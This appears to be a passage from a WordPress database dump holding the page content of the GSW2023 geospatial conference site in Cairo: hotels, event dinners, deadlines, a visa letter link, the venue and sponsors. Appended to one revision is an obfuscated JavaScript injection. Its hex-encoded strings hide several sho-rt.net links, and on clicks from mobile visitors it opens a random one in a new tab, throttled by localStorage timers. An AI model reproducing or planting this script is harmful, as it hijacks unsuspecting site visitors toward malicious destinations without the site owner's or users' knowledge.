width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" />\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a>\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\r\n<img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\r\n<img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<ul>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-15 23:42:52','2023-08-15 23:42:52','',3066,'https://gsw2023.com/?p=5227',0,'revision','',0),
(5228,1,'2023-08-15 23:45:35','2023-08-15 23:45:35','[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column][vc_column_text]\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #0000ff;\"><strong>Under the Auspices of </strong></span>\r\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span>\r\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]\r\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" 